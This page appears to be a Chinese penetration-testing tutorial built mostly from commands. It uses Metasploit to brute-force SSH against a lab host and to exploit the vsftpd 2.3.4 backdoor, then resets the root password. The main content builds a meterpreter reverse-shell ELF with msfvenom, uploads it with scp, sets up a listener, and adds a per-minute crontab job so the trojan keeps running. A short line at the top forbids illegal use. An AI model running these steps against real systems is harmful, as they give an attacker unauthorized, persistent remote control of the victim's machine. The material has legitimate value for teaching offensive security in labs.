当前位置: 首页 > news >正文

linux暴力破解漏洞利用

==禁止非法操作,仅限参考=

暴力破解

  • 编辑密码本(vim password.txt)
  • 无声进入msf(msfconsole -q)
  • 搜索ssh_login相关程序(search ssh_login)
  • 设置攻击参数(use 0)
    设置用户名(set username msfadmin)
    设置密码本(set pass_file /root/password.txt)
    设置攻击目标(set rhosts 192.168.10.143)
  • 发起攻击(运行run)
  • 查看攻击会话(sessions)
  • 进入某个会话(sessions ID)
  • 退出(exit)
  • show options://显示程序运行时所需要的参数

漏洞利用

  • 扫描目标是否存在“笑脸漏洞(vsftpd2.3.4)”(nmap -sV ip)
  • 发起漏洞利用
    进入msf(msfconsole)
    搜索vsftpd(search vsftpd)
    使用程序(use 0)
    设置攻击目标(set rhosts ip)
  • 发起攻击(run)
  • whoami://查看是哪个用户
  • passwd root:// 设置密码

植入木马,达到长期控制的目的

  • msfvenom:攻击载荷生成器
    -p://选择一个载荷
    -f://生成文件格式 (linux可执行的程序文件:elf,windows可执行的文件:exe)
    lhost://监听地址(攻击机kali的地址)
    lport://监听端口(攻击机kali的端口)
    -o:指定输出的文件名
    -h:查看帮助
  • msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.10.224 lport=4444 -0 shell: // 给主机192.168.10.224,生成一个名为shell,端口为4444的木马程序

为了防止上传报错,需要修改kali的ssh配置

  • 创建.ssh目录
    mkdir .ssh
  • 配置config
    vim .ssh/config
  • 添加三行配置
  • Host
  • HostkeyAlgorithms +ssh-rsa
  • PubkeyAcceptedKeyTypes +ssh-rsa
  • 以root身份上传shell后门到192.168.10.143的/mnt
    scp shell root@192.168.10.143:/mnt

运行shell

  • 手动运行shell后门程序
    /mnt/shell & (&后台运行)
  • 在kali中侦听木马程序
  • 进入msf
    msfconsole
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
    ps:侦听模块在侦听木马上线的时候参数值必须与生成木马的参数一致

如果想要让木马长期运行不被kill,需要做计划任务,定期运行

  • 编辑计划任务:
  • EDITOR:编辑器
    EDITOR=vim crontab -e
            • /mnt/shell&(每分钟运行一次)
  • 再次进入msf
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
  • 查看计划任务
    crontab -l
  • meterpreter>下将会话放到后台
    background

相关文章:

  • 未来已来:Angular、React、Vue.js——前端框架的三大巨头
  • 【POSIX】使用iconv库将UTF-8字符串转换为UTF-16字符串
  • Pytorch环境配置
  • Mybatis06-动态SQL
  • 海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞复现
  • 【介绍下什么是Kubernetes编排系统】
  • C语言操作符详解(二)
  • 数据库练习题
  • 颠沛流离学二叉树(完结撒花篇)
  • Linux路由设置
  • 数据结构笔记2 栈和队列
  • Windows 宿主机访问 VirtualBox 虚拟机中创建的 docker 容器中的 mysql8.0 的数据
  • 基于SpringBoot的装饰工程管理系统源码数据库
  • DevOps 安全集成:从开发到部署,全生命周期安全守护
  • htb_office
  • Android --- MVVM+DataBinding+Fragment+Retrofit+Adapter 简单示例
  • 提高篇(二):高级绘图技巧:在Processing中创造精美图形
  • docker镜像转移,mac Linux
  • 前端开发高频面试题
  • 基于深度学习的红外船舶检测识别分类完整实现数据集8000+张
  • 非洲中青年军官代表团访华,赴北京、长沙、韶山等地参访交流
  • 黔西游船倾覆事故84名落水人员已全部找到,10人不幸遇难
  • 马克思主义理论研究教学名师系列访谈|王公龙:做好马克思主义研究,既要“钻进去”又要“跳出来”
  • 苏杯登顶看到老将新人冲劲,国羽用冠军为奥运新周期开好头
  • 2025五一档电影票房破6亿
  • 《开始推理吧3》:演员没包袱,推理更共情